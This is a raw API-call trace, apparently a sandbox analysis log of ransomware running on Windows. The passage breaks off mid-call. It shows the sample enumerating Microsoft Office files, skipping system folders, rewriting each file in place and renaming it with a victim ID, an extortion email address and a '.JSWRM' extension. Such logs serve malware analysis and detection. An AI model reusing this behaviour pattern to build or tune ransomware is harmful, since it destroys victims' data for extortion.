(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0121.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0121.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0121.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.219] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0121.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0121.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0121.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0121.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0121.220] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2e8e3f2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2e8e3f2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x474a99c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x11660, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SGRES.DLL", cAlternateFileName="")) returned 1 [0121.220] lstrcmpiW (lpString1="SGRES.DLL", lpString2=".") returned 1 [0121.220] lstrcmpiW (lpString1="SGRES.DLL", lpString2="..") returned 1 [0121.220] lstrcmpiW (lpString1="SGRES.DLL", lpString2="...") returned 1 [0121.221] lstrcmpiW (lpString1="SGRES.DLL", lpString2="windows") returned -1 [0121.221] lstrcmpiW (lpString1="SGRES.DLL", lpString2="recovery") returned 1 [0121.221] lstrcmpiW (lpString1="SGRES.DLL", lpString2="perflogs") returned 1 [0121.221] lstrcmpiW (lpString1="SGRES.DLL", lpString2="documents and settings") returned 1 [0121.221] lstrcmpiW (lpString1="SGRES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0121.221] lstrcmpiW (lpString1="SGRES.DLL", lpString2="system volume information") returned -1 [0121.221] lstrcmpiW (lpString1="SGRES.DLL", lpString2="msocache") returned 1 [0121.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SGRES.DLL", lpUsedDefaultChar=0x0) returned 9 [0121.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0121.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SGRES.DLL", lpUsedDefaultChar=0x0) returned 9 [0121.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0121.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0121.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0121.221] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x332cc84, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x332cc84, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x332cc84, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xc4b8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SHAPNUM.VSL", cAlternateFileName="")) returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2=".") returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="..") returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="...") returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="windows") returned -1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="recovery") returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="perflogs") returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="documents and settings") returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="$RECYCLE.BIN") returned 1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="system volume information") returned -1 [0121.221] lstrcmpiW (lpString1="SHAPNUM.VSL", lpString2="msocache") returned 1 [0121.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0121.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.VSL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.VSL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHAPNUM.VSL", lpUsedDefaultChar=0x0) returned 11 [0121.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0121.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0121.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.VSL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.VSL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHAPNUM.VSL", lpUsedDefaultChar=0x0) returned 11 [0121.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0121.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0121.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0121.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0121.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SHAPNUM.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\shapnum.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.223] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50360) returned 1 [0121.223] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc4b0) returned 0x24e1d8 [0121.224] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc4b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc4b0, lpOverlapped=0x0) returned 1 [0121.228] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.228] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc4b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc4b0, lpOverlapped=0x0) returned 1 [0121.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.229] CloseHandle (hObject=0x238) returned 1 [0121.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0121.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0121.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0121.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0121.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0121.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0121.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.230] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SHAPNUM.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\shapnum.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SHAPNUM.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\shapnum.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0121.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0121.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0121.231] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x474a99c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x474a99c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x474a99c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKY.CSS", cAlternateFileName="")) returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2=".") returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="..") returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="...") returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="windows") returned -1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="recovery") returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="perflogs") returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="documents and settings") returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="$RECYCLE.BIN") returned 1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="system volume information") returned -1 [0121.231] lstrcmpiW (lpString1="SKY.CSS", lpString2="msocache") returned 1 [0121.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKY.CSS", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0121.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKY.CSS", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKY.CSS", lpUsedDefaultChar=0x0) returned 7 [0121.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKY.CSS", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0121.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKY.CSS", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKY.CSS", lpUsedDefaultChar=0x0) returned 7 [0121.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0121.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0121.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0121.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKY.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sky.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.232] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0121.232] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0121.232] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0121.233] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.234] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0121.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0121.234] CloseHandle (hObject=0x238) returned 1 [0121.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0121.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0121.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0121.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0121.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0121.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0121.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0121.234] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKY.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sky.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKY.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sky.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0121.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0121.235] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe50d9a48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe50d9a48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1efdc, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB.HXS", cAlternateFileName="")) returned 1 [0121.235] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2=".") returned 1 [0121.235] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="..") returned 1 [0121.235] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="...") returned 1 [0121.235] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="windows") returned -1 [0121.235] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="recovery") returned 1 [0121.235] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="perflogs") returned 1 [0121.236] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="documents and settings") returned 1 [0121.236] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="$RECYCLE.BIN") returned 1 [0121.236] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="system volume information") returned -1 [0121.236] lstrcmpiW (lpString1="SKYPEFB.HXS", lpString2="msocache") returned 1 [0121.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0121.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB.HXS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB.HXS", lpUsedDefaultChar=0x0) returned 11 [0121.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0121.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB.HXS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB.HXS", lpUsedDefaultChar=0x0) returned 11 [0121.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0121.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0121.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0121.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.237] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=126940) returned 1 [0121.237] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1efd0) returned 0x24e1d8 [0121.237] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1efd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x1efd0, 